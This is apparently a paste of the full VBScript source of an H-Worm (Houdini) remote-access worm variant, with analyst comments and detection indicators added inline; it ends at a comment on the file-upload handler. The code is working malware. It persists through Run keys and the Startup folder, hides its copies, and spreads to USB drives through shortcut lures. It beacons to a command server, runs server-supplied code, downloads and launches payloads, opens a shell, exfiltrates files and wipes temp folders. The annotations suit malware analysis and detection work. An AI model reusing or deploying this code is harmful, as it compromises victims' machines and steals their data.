Racco42

Untitled

Aug 24th, 2018
VBScript 25.18 KB | None | 0 0
  1. "'<[ >> H-Worm Plus | ReNEW version by MeoIT << ]>
  2. '   <[ Add Functions and fixed some place ]>
  3. '<[ >> CREDIT and THANKS: njQ8, Houdini and me :) << ]>
  ' Script-level configuration and shared COM objects for this H-Worm variant.
  ' Identifiers are Vietnamese written without diacritics; rough English glosses are given where they help.
  ' Preferred install directory (environment string, expanded a few lines below).
  4. SET_THUMUC_CAIDAT_SAU = "%appdata%"
  ' WScript.Shell: used throughout for registry access, process launch and environment expansion.
  5. dim OBJ_WS_SHELL
  6. set OBJ_WS_SHELL = wscript.createobject("wscript.shell")
  ' Scripting.FileSystemObject: used for every file copy, delete and attribute change.
  7. dim OBJ_HE_THONG_TAPTIN
  8. set OBJ_HE_THONG_TAPTIN = createobject("scripting.filesystemobject")
  ' MSXML2.XMLHTTP: the HTTP client used for the command channel.
  9. dim MANG_CUA_TUI
  10. set MANG_CUA_TUI = createobject("msxml2.xmlhttp")
  ' File name of the running script; reused as the installed file name and as the registry value/key name.
  11. TEN_SAU_CAI_DAT = wscript.scriptname
  ' Per-user Startup folder and the expanded install directory, both with a trailing backslash.
  12. DUONG_DAN_SSTTAARRTTUUPP = OBJ_WS_SHELL.specialfolders ("startup") & "\"
  13. THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings(SET_THUMUC_CAIDAT_SAU) & "\"
  14. dim OBJ_SYS_ENV,OBJ_USER_ENV
  15. dim STR_DUONG_DAN_USER_TEMP
  16. dim STR_DUONG_DAN_SYS_TEMP
  17. dim STR_USER_PROFILE,STR_THU_MUC_FILE_TAM_IE
  ' Resolve the user and system TEMP directories and the user profile path.
  18. set OBJ_SYS_ENV = OBJ_WS_SHELL.Environment("System")
  19. set OBJ_USER_ENV = OBJ_WS_SHELL.Environment("User")
  20. STR_DUONG_DAN_USER_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_USER_ENV("TEMP"))
  21. STR_DUONG_DAN_SYS_TEMP = OBJ_WS_SHELL.ExpandEnvironmentStrings(OBJ_SYS_ENV("TEMP"))
  22. STR_USER_PROFILE = OBJ_WS_SHELL.ExpandEnvironmentStrings("%userprofile%")
  ' Fall back to %temp% as the install directory when %appdata% does not exist.
  23. if not OBJ_HE_THONG_TAPTIN.folderexists(THUMUC_CAIDAT_SAU) then THUMUC_CAIDAT_SAU = OBJ_WS_SHELL.expandenvironmentstrings("%temp%") & "\"
  ' Field separator used in both directions of the command protocol.
  24. BO_CHIA_KY_TU = "<|>"
  ' Polling interval passed to wscript.sleep in the main loop (milliseconds); the "sleep" command can replace it.
  25. THOI_GIAN_NGU = 4915
  26. dim KET_NOI_DA_SAN_SANG
  27. dim LENH_THUC_THI
  28. dim THONG_SO_CHO_LENH_THUC_THI
  ' Origin marker ("true - <date>" / "false - <date>") filled in by BAT_DAU_CHAY_HAM.
  29. CO_HAY_KHONG_TU_USB = ""
  ' Holds the text-stream handle opened on the installed copy in BAT_DAU_CHAY_HAM.
  30. dim LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT
  31. startdate = ""
  32. info = ""
  ' Network indicators for this sample: command server host name and TCP port (plain HTTP).
  33. DIA_CHI_IP_KET_NOI = "shkis.publicvm.com"
  34. CONG_KET_NOI = 83
  ' Feature switches for the removable-drive shortcut replacement (files / folders).
  ' Both are false here, so the shortcut loops in CAI_DAT_VAO_USB_THU_MUC_USB exit on their first iteration.
  35. BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB = false
  36. BAT_TAT_LAY_LAN_LINK_THU_MUC_USB = false
  ' Main body: run the startup routine once, then poll the command server forever.
  ' Errors are suppressed globally, so a failed request or a malformed reply just falls through to the sleep.
  37. on error resume next
  38. BAT_DAU_CHAY_HAM
  39. while true
  ' Each iteration first runs the analysis-tool check and the install/removable-drive copy routine.
  40. CHONG_CAC_PROC
  41. CAI_DAT_VAO_USB_THU_MUC_USB
  42. KET_NOI_DA_SAN_SANG = ""
  ' Beacon: POST to /is-ready; the reply is "<command><|><arg1><|><arg2>...".
  43. KET_NOI_DA_SAN_SANG = THANK_GOD_YOU_ARE_HERE("is-ready","")
  44. LENH_THUC_THI = split(KET_NOI_DA_SAN_SANG,BO_CHIA_KY_TU)
  ' Command dispatch. The command words below are literal protocol strings and usable as content indicators.
  45. select case LENH_THUC_THI(0)
  ' Protocol keyword is spelled "excecute" in this sample.
  46. Case "excecute"
  47. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  ' Runs server-supplied text as VBScript inside this process (full remote code execution).
  48. execute THONG_SO_CHO_LENH_THUC_THI
  49. case "update"
  50. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  ' Release the handle on the installed copy, overwrite it (mode 2 = ForWriting, -1 = Unicode)
  ' with the server-supplied script text, relaunch it under wscript.exe //B and exit this instance.
  51. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
  52. set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,2,false,-1)
  53. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.write THONG_SO_CHO_LENH_THUC_THI
  54. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
  55. OBJ_WS_SHELL.run "wscript.exe //B " & chr(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chr(34)
  56. wscript.quit
  ' Self-removal routine (GO_BO_SUB ends with wscript.quit).
  57. Case "uninstall"
  58. GO_BO_SUB
  ' Fetch a file from the command server and run it.
  59. case "send"
  60. DUA_FILE_LEN_VIC_ROI_CHAY_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
  ' Fetch a file from an arbitrary URL and run it.
  61. Case "site-send"
  62. LAY_FILE_THEO_URL_VA_THUC_THI_SUB LENH_THUC_THI(1),LENH_THUC_THI(2)
  ' Upload a local file to the command server.
  63. case "recv"
  64. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  65. LAY_FILE_VE_NHA_QUANLYFILE_HAM (THONG_SO_CHO_LENH_THUC_THI)
  ' Enumeration commands: each result is POSTed back under a matching "is-enum-*" path.
  66. Case "enum-driver"
  67. THANK_GOD_YOU_ARE_HERE "is-enum-driver",LAY_THONG_TIN_CAC_O_DIA_HAM
  68. case "enum-faf"
  69. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  70. THANK_GOD_YOU_ARE_HERE "is-enum-faf",LAY_THONG_TIN_THU_MUC_HAM(THONG_SO_CHO_LENH_THUC_THI)
  71. Case "enum-process"
  72. THANK_GOD_YOU_ARE_HERE "is-enum-process",LAY_TTIN_CAC_TIEN_TRINH_HAM
  ' Run a shell command and POST its output back under /is-cmd-shell.
  73. case "cmd-shell"
  74. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  75. THANK_GOD_YOU_ARE_HERE "is-cmd-shell",DIEU_KHIEN_CMD_HAM(THONG_SO_CHO_LENH_THUC_THI)
  ' Delete a file or folder by path.
  76. Case "delete"
  77. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  78. XOA_TAP_TIN_VA_THU_MUC_SUB (THONG_SO_CHO_LENH_THUC_THI)
  ' Kill a process by PID.
  79. case "exit-process"
  80. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  81. TAT_TIEN_TRINH_SUB (THONG_SO_CHO_LENH_THUC_THI)
  ' Change the polling interval; the argument goes through eval, so it is evaluated as a VBScript expression.
  82. Case "sleep"
  83. THONG_SO_CHO_LENH_THUC_THI = LENH_THUC_THI(1)
  84. THOI_GIAN_NGU = eval(THONG_SO_CHO_LENH_THUC_THI)
  85. end select
  ' Wait before the next beacon; this gives the periodic POST /is-ready pattern seen on the wire.
  86. wscript.sleep THOI_GIAN_NGU
  87. wend
  ' Startup routine: records an origin marker in the registry, runs the install routine,
  ' then opens a handle on the installed copy. Takes no arguments and sets no return value.
  88. function BAT_DAU_CHAY_HAM
  89. on error resume next
  ' Read the default value of HKLM\software\<script base name>\ (host artifact: key named after the script).
  90. CO_HAY_KHONG_TU_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\")
  91. if CO_HAY_KHONG_TU_USB = "" then
  ' True when the full path is "<drive letter>:\<script name>", i.e. the script sits in a drive root.
  ' The marker ("true"/"false" plus the date) is later appended to the host-info string by HAM_TAP_HOP_CAC_INFOR.
  92. if lcase(mid(wscript.scriptfullname,2)) = ":\" & lcase(TEN_SAU_CAI_DAT) then
  93. CO_HAY_KHONG_TU_USB = "true - " & date
  94. OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
  95. else
  96. CO_HAY_KHONG_TU_USB = "false - " & date
  97. OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\" & split(TEN_SAU_CAI_DAT,".")(0) & "\", CO_HAY_KHONG_TU_USB, "REG_SZ"
  98. end if
  99. end if
  ' Persistence and copy-to-disk step.
  100. CAI_DAT_VAO_MAY_SUB
  101. set RUT_GON_FNAME = OBJ_HE_THONG_TAPTIN.getfile(wscript.scriptfullname)
  102. set RUT_GON_FNAME_CAI = OBJ_HE_THONG_TAPTIN.getfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT)
  ' Compares the running path with the installed path, but the branch body is empty in this sample.
  103. if lcase(RUT_GON_FNAME.shortpath) <> lcase(RUT_GON_FNAME_CAI.shortpath) then
  104. end if
  105. err.clear
  ' Open the installed copy for appending (8), no create, Unicode (-1); the handle stays in a script-level variable.
  ' NOTE(review): presumably this keeps the file open so a second instance fails here and quits - confirm.
  106. set LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT = OBJ_HE_THONG_TAPTIN.opentextfile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,8,false,-1)
  107. if err.number > 0 then wscript.quit
  108. end function
  ' Install/persistence routine. It is called at startup and again on every main-loop pass
  ' (via CAI_DAT_VAO_USB_THU_MUC_USB), so deleted artifacts are re-created while the script runs.
  ' Host artifacts written here: two Run values, two hidden+system file copies, one Explorer setting.
  109. sub CAI_DAT_VAO_MAY_SUB()
  110. on error resume next
  111. CHUOI_PC = "."
  112. set DT_WIN_MGR = GetObject("winmgmts:" _
  113. & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
  ' Exit without installing when exactly one process named filemonitor.exe is running.
  114. set TIEN_TRINH_KO_CAI_NOT_RUN = DT_WIN_MGR.ExecQuery _
  115. ("SELECT * FROM Win32_Process WHERE Name = " & _
  116. "'filemonitor.exe'")
  117. if TIEN_TRINH_KO_CAI_NOT_RUN.Count = 1 then
  118. wscript.quit
  119. end if
  ' Run-key persistence in HKCU and HKLM: value name = script base name,
  ' data = wscript.exe //B "<install dir><script name>" (//B is batch mode, no script prompts or error dialogs).
  120. OBJ_WS_SHELL.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B " & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
  121. OBJ_WS_SHELL.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0), "wscript.exe //B "  & chrw(34) & THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT & chrw(34) , "REG_SZ"
  ' Copy the running script to the install directory and to the Startup folder (overwrite = true).
  122. OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT,true
  123. OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname,DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
  ' Attributes 2+4 = Hidden + System on both copies.
  124. OBJ_HE_THONG_TAPTIN.GetFile(DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT).Attributes=2+4
  125. OBJ_HE_THONG_TAPTIN.GetFile(THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT).Attributes=2+4
  ' When Explorer's "Hidden" setting is 1 or unreadable, overwrite it with 0.
  ' NOTE(review): presumably meant to stop Explorer from showing hidden files - confirm the effect of value 0.
  126. if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" Or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" Then
  127. OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
  128. end if
  ' Purge entries older than 8 days from user TEMP, system TEMP and the IE cache folders.
  ' Forensic note: this removes aged temp artifacts on every pass.
  129. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_USER_TEMP
  130. XOA_TEMP_SAU_X_NGAY_SUB STR_DUONG_DAN_SYS_TEMP
  131. STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  132. XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
  133. STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
  134. XOA_TEMP_SAU_X_NGAY_SUB STR_THU_MUC_FILE_TAM_IE
  135. end sub
  ' Removable-drive propagation routine, run on every main-loop pass.
  ' It re-runs the local install, then copies the script to the root of each ready removable drive.
  ' The shortcut replacement of files and folders is gated by two script-level flags.
  136. sub CAI_DAT_VAO_USB_THU_MUC_USB
  137. on error resume next
  138. dim BO_TAO_LOI_TAT
  139. dim TEN_FILE_TRONG_USB
  140. dim TEN_THU_MUC_TRONG_USB
  141. dim BIEU_TUONG_LINK_FILE_TRONG_USB
  142. dim BIEU_TUONG_THU_MUC_TRONG_USB
  ' Re-apply Run keys, file copies and attributes on the local machine.
  143. CAI_DAT_VAO_MAY_SUB
  144. for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
  145. if CAC_USB.isready = true then
  146. if CAC_USB.freespace > 0 then
  ' DriveType 1 = removable.
  147. if CAC_USB.drivetype = 1 then
  ' Drop a Hidden+System copy of the script in the drive root (removable-media artifact).
  148. OBJ_HE_THONG_TAPTIN.copyfile wscript.scriptfullname, CAC_USB.path & "\" & TEN_SAU_CAI_DAT,true
  149. if OBJ_HE_THONG_TAPTIN.fileexists(CAC_USB.path & "\" & TEN_SAU_CAI_DAT) then
  150. OBJ_HE_THONG_TAPTIN.getfile(CAC_USB.path & "\" & TEN_SAU_CAI_DAT).attributes = 2+4
  151. end if
  152. for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").Files
  ' Gate: with the file flag false the loop exits before touching any file.
  153. if not BAT_TAT_LAY_LAN_LINK_TAP_TIN_USB then exit for
  154. TAP_TIN_DA_CO_TRONG_USB.attributes=0
  155. if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
  ' Skip existing .lnk files; every other root file is set Hidden+System.
  156. if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".") (ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
  157. TAP_TIN_DA_CO_TRONG_USB.attributes = 2+4
  158. if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
  ' Create "<name before the first dot>.lnk" next to the hidden original.
  159. TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
  160. set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_FILE_TRONG_USB (0) & ".lnk")
  ' WindowStyle 7 = minimized. The shortcut targets cmd.exe and its arguments start the script and then the original file.
  ' Detection: .lnk in a removable-drive root whose target is cmd.exe with "/c start ... &start ... &exit" arguments.
  161. BO_TAO_LOI_TAT.windowstyle = 7
  162. BO_TAO_LOI_TAT.targetpath = "cmd.exe"
  163. BO_TAO_LOI_TAT.workingdirectory = ""
  164. BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start " & replace(TAP_TIN_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  ' Look up the registered default icon for the original file's extension so the shortcut shows that icon.
  165. BIEU_TUONG_LINK_FILE_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\" & OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\." & split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))& "\") & "\defaulticon\")
  166. if instr(BIEU_TUONG_LINK_FILE_TRONG_USB,",") = 0 then
  167. BO_TAO_LOI_TAT.iconlocation = TAP_TIN_DA_CO_TRONG_USB.path
  168. else
  169. BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_LINK_FILE_TRONG_USB
  170. end if
  171. BO_TAO_LOI_TAT.save()
  172. end if
  173. end if
  174. end if
  175. next
  176. for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\" ).subfolders
  ' Gate: with the folder flag false the loop exits before touching any folder.
  177. if not BAT_TAT_LAY_LAN_LINK_THU_MUC_USB then exit for
  ' Same pattern for folders: set Hidden+System on the folder and create "<folder name>.lnk".
  178. THU_MUC_DA_CO_TRONG_USB.attributes = 2+4
  179. TEN_THU_MUC_TRONG_USB = THU_MUC_DA_CO_TRONG_USB.name
  180. set BO_TAO_LOI_TAT = OBJ_WS_SHELL.createshortcut(CAC_USB.path & "\" & TEN_THU_MUC_TRONG_USB & ".lnk")
  181. BO_TAO_LOI_TAT.windowstyle = 7
  182. BO_TAO_LOI_TAT.targetpath = "cmd.exe"
  183. BO_TAO_LOI_TAT.workingdirectory = ""
  184. BO_TAO_LOI_TAT.arguments = "/c start " & replace(TEN_SAU_CAI_DAT," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(THU_MUC_DA_CO_TRONG_USB.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  ' Icon is taken from the registered default folder icon.
  185. BIEU_TUONG_THU_MUC_TRONG_USB = OBJ_WS_SHELL.regread("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  186. if instr(BIEU_TUONG_THU_MUC_TRONG_USB,",") = 0 then
  187. BO_TAO_LOI_TAT.iconlocation = THU_MUC_DA_CO_TRONG_USB.path
  188. else
  189. BO_TAO_LOI_TAT.iconlocation = BIEU_TUONG_THU_MUC_TRONG_USB
  190. end if
  191. BO_TAO_LOI_TAT.save()
  192. next
  193. end if
  194. end if
  195. end if
  196. next
  197. err.clear
  198. end sub
  ' Handler for the "uninstall" command: removes the script's own persistence and copies, then exits.
  ' For responders this doubles as a list of the artifacts the sample itself considers its footprint.
  ' It does not delete the HKLM\software\<script base name>\ marker key written at startup.
  199. sub GO_BO_SUB
  200. on error resume next
  201. dim TEN_FILE_TRONG_USB
  ' Clear attributes on the running script and release the handle held on the installed copy.
  202. OBJ_HE_THONG_TAPTIN.GetFile(wscript.scriptfullname).Attributes=0
  203. LAN_CHAY_THU_NHAT_DUNG_CHO_CAP_NHAT.close
  ' Remove both Run values and the Startup-folder, install-directory and running copies.
  204. OBJ_WS_SHELL.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
  205. OBJ_WS_SHELL.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split(TEN_SAU_CAI_DAT,".")(0)
  206. OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_SSTTAARRTTUUPP & TEN_SAU_CAI_DAT,true
  207. OBJ_HE_THONG_TAPTIN.deletefile THUMUC_CAIDAT_SAU & TEN_SAU_CAI_DAT
  208. OBJ_HE_THONG_TAPTIN.deletefile wscript.scriptfullname,true
  ' Same Explorer "Hidden" write as the install routine; the setting is not restored to its earlier value.
  209. if OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" or OBJ_WS_SHELL.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="" then
  210. OBJ_WS_SHELL.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
  211. end if
  ' Empty the TEMP and IE cache folders completely (no age filter here).
  ' Forensic note: downloaded payloads under TEMP are removed by this step.
  212. XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_USER_TEMP
  213. XOA_TEMP_SUB_LUC_GO STR_DUONG_DAN_SYS_TEMP
  214. STR_THU_MUC_FILE_TAM_IE = STR_USER_PROFILE & "\AppData\Local\Microsoft\Windows\Temporary Internet Files"
  215. XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
  216. STR_THU_MUC_FILE_TAM_IE = STR_THU_MUC_FILE_TAM_IE & "\Content.IE5"
  217. XOA_TEMP_SUB_LUC_GO STR_THU_MUC_FILE_TAM_IE
  ' Clean every ready removable drive (DriveType 1).
  218. for each CAC_USB in OBJ_HE_THONG_TAPTIN.drives
  219. if CAC_USB.isready = true then
  220. if CAC_USB.freespace > 0 then
  221. if CAC_USB.drivetype = 1 then
  222. for each TAP_TIN_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").files
  223. on error resume next
  224. if instr(TAP_TIN_DA_CO_TRONG_USB.name,".") then
  225. if lcase(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")(ubound(split(TAP_TIN_DA_CO_TRONG_USB.name, ".")))) <> "lnk" then
  ' Non-.lnk file: clear its attributes, then delete either its matching shortcut or, if it is the script copy, the file itself.
  226. TAP_TIN_DA_CO_TRONG_USB.attributes = 0
  227. if ucase(TAP_TIN_DA_CO_TRONG_USB.name) <> ucase(TEN_SAU_CAI_DAT) then
  228. TEN_FILE_TRONG_USB = split(TAP_TIN_DA_CO_TRONG_USB.name,".")
  229. OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TEN_FILE_TRONG_USB(0) & ".lnk")
  230. else
  231. OBJ_HE_THONG_TAPTIN.deletefile(CAC_USB.path & "\" & TAP_TIN_DA_CO_TRONG_USB.name)
  232. end if
  233. else
  ' Every .lnk in the drive root is deleted, whether or not this script created it.
  234. OBJ_HE_THONG_TAPTIN.deletefile(TAP_TIN_DA_CO_TRONG_USB.path)
  235. end if
  236. end if
  237. OBJ_HE_THONG_TAPTIN.DeleteFile wscript.scriptfullname,true
  238. next
  ' Clear attributes on root folders so they become visible again.
  239. for each THU_MUC_DA_CO_TRONG_USB in OBJ_HE_THONG_TAPTIN.getfolder(CAC_USB.path & "\").subfolders
  240. THU_MUC_DA_CO_TRONG_USB.attributes = 0
  241. next
  242. end if
  243. end if
  244. end if
  245. next
  246. wscript.quit
  247. end sub
  ' Command-channel transport: one synchronous HTTP POST per call.
  '   LENH_THUC_THI              - request path segment ("is-ready", "is-enum-process", ...)
  '   THONG_SO_CHO_LENH_THUC_THI - request body (command output, or "" for the beacon)
  ' Returns the response text; if the request fails, the value assigned on the first line (the body) remains.
  ' Detection: cleartext POST to http://<host>:<port>/is-* with the host-info string
  ' ("<|>"-separated fields) carried in the request header set below.
  248. function THANK_GOD_YOU_ARE_HERE(LENH_THUC_THI,THONG_SO_CHO_LENH_THUC_THI)
  249. THANK_GOD_YOU_ARE_HERE = THONG_SO_CHO_LENH_THUC_THI
  250. MANG_CUA_TUI.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/" & LENH_THUC_THI, false
  ' The header name is passed with a trailing colon ("user-agent:"); its value is the host fingerprint.
  251. MANG_CUA_TUI.setrequestheader "user-agent:",HAM_TAP_HOP_CAC_INFOR
  252. MANG_CUA_TUI.send THONG_SO_CHO_LENH_THUC_THI
  253. THANK_GOD_YOU_ARE_HERE = MANG_CUA_TUI.responsetext
  254. end function
  ' Handler for "site-send": download a file from a server-chosen URL and run it.
  '   URL_CHUA_FILE    - URL to fetch with HTTP GET
  '   TEN_FILE_GUI_URL - file name to save under %TEMP%\Luu_Tam_Nhe\
  ' Detection: wscript.exe writing a file under %TEMP%\Luu_Tam_Nhe\ and then launching it.
  255. sub LAY_FILE_THEO_URL_VA_THUC_THI_SUB(URL_CHUA_FILE,TEN_FILE_GUI_URL)
  256. CHUOI_LIEN_KET = URL_CHUA_FILE
  257. CHUOI_DAT_FILE_VAO_DAU = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\" & TEN_FILE_GUI_URL
  258. set OBJ_LAY_FILE_URL_VA_CHAY = createobject("msxml2.xmlhttp")
  259. OBJ_LAY_FILE_URL_VA_CHAY.open "get", CHUOI_LIEN_KET, false
  260. OBJ_LAY_FILE_URL_VA_CHAY.send
  261. set OBJ_HE_THONG_TAPTIN_FILE_URL_RUN = createobject("scripting.filesystemobject")
  ' Remove any earlier file at the destination path before saving.
  262. if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  263. OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
  264. end if
  ' On HTTP 200, write the raw response body to disk through a binary (type 1) ADODB.Stream.
  265. if OBJ_LAY_FILE_URL_VA_CHAY.status = 200 then
  266. dim ADO_TAI_URL_CHAY
  267. set ADO_TAI_URL_CHAY = createobject("adodb.stream")
  268. with ADO_TAI_URL_CHAY
  269. .type = 1
  270. .open
  271. .write OBJ_LAY_FILE_URL_VA_CHAY.responsebody
  272. .savetofile CHUOI_DAT_FILE_VAO_DAU
  273. .close
  274. end with
  275. set ADO_TAI_URL_CHAY = nothing
  276. end if
  ' Launch the saved file by its short (8.3) path.
  277. if OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  278. OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_FILE_URL_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
  279. end if
  280. end sub
  ' Handler for "send": pull a file from the command server and run it.
  '   URL_CHUA_FILE    - file path as named by the server (backslash-separated); sent back in the request URL
  '   THU_MUC_VIC_NHAN - destination directory; defaults to %TEMP%\Luu_Tam_Nhe\ when empty
  ' Detection: POST to /is-sending<|><path> followed by a file write and process launch by wscript.exe.
  281. sub DUA_FILE_LEN_VIC_ROI_CHAY_SUB(URL_CHUA_FILE,THU_MUC_VIC_NHAN)
  282. if THU_MUC_VIC_NHAN = "" then
  283. THU_MUC_VIC_NHAN = STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe\"
  284. end if
  ' Local file name = everything after the last backslash of the server-supplied path.
  285. CHUOI_DAT_FILE_VAO_DAU = THU_MUC_VIC_NHAN & mid(URL_CHUA_FILE, instrrev(URL_CHUA_FILE,"\") + 1)
  286. set OBJ_DUA_FILE_LEN_VIC_VA_CHAY = createobject("msxml2.xmlhttp")
  287. OBJ_DUA_FILE_LEN_VIC_VA_CHAY.open "post","http://" & DIA_CHI_IP_KET_NOI & ":" & CONG_KET_NOI &"/is-sending" & BO_CHIA_KY_TU & URL_CHUA_FILE, false
  288. OBJ_DUA_FILE_LEN_VIC_VA_CHAY.send ""
  289. set OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN = createobject("scripting.filesystemobject")
  ' Remove any earlier file at the destination path before saving.
  290. if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  291. OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.deletefile(CHUOI_DAT_FILE_VAO_DAU),true
  292. end if
  ' On HTTP 200, write the raw response body to disk through a binary (type 1) ADODB.Stream.
  293. if OBJ_DUA_FILE_LEN_VIC_VA_CHAY.status = 200 then
  294. dim ADO_TAI_DISKFILE_LEN_VA_CHAY
  295. set ADO_TAI_DISKFILE_LEN_VA_CHAY = createobject("adodb.stream")
  296. with ADO_TAI_DISKFILE_LEN_VA_CHAY
  297. .type = 1
  298. .open
  299. .write OBJ_DUA_FILE_LEN_VIC_VA_CHAY.responsebody
  300. .savetofile CHUOI_DAT_FILE_VAO_DAU
  301. .close
  302. end with
  303. set ADO_TAI_DISKFILE_LEN_VA_CHAY = nothing
  304. end if
  ' Launch the saved file by its short (8.3) path.
  305. if OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.fileexists(CHUOI_DAT_FILE_VAO_DAU) then
  306. OBJ_WS_SHELL.run OBJ_HE_THONG_TAPTIN_DUA_FILE_LEN_VA_RUN.getfile(CHUOI_DAT_FILE_VAO_DAU).shortpath
  307. end if
  308. end sub
  ' Handler for "recv": file exfiltration. Reads a local file as binary and POSTs it to the command server.
  '   URL_CHUA_FILE - local path of the file to upload (despite the name, not a URL)
  ' Sets no return value.
  ' Detection: POST to /is-recving<|><local path> whose body is the raw file content.
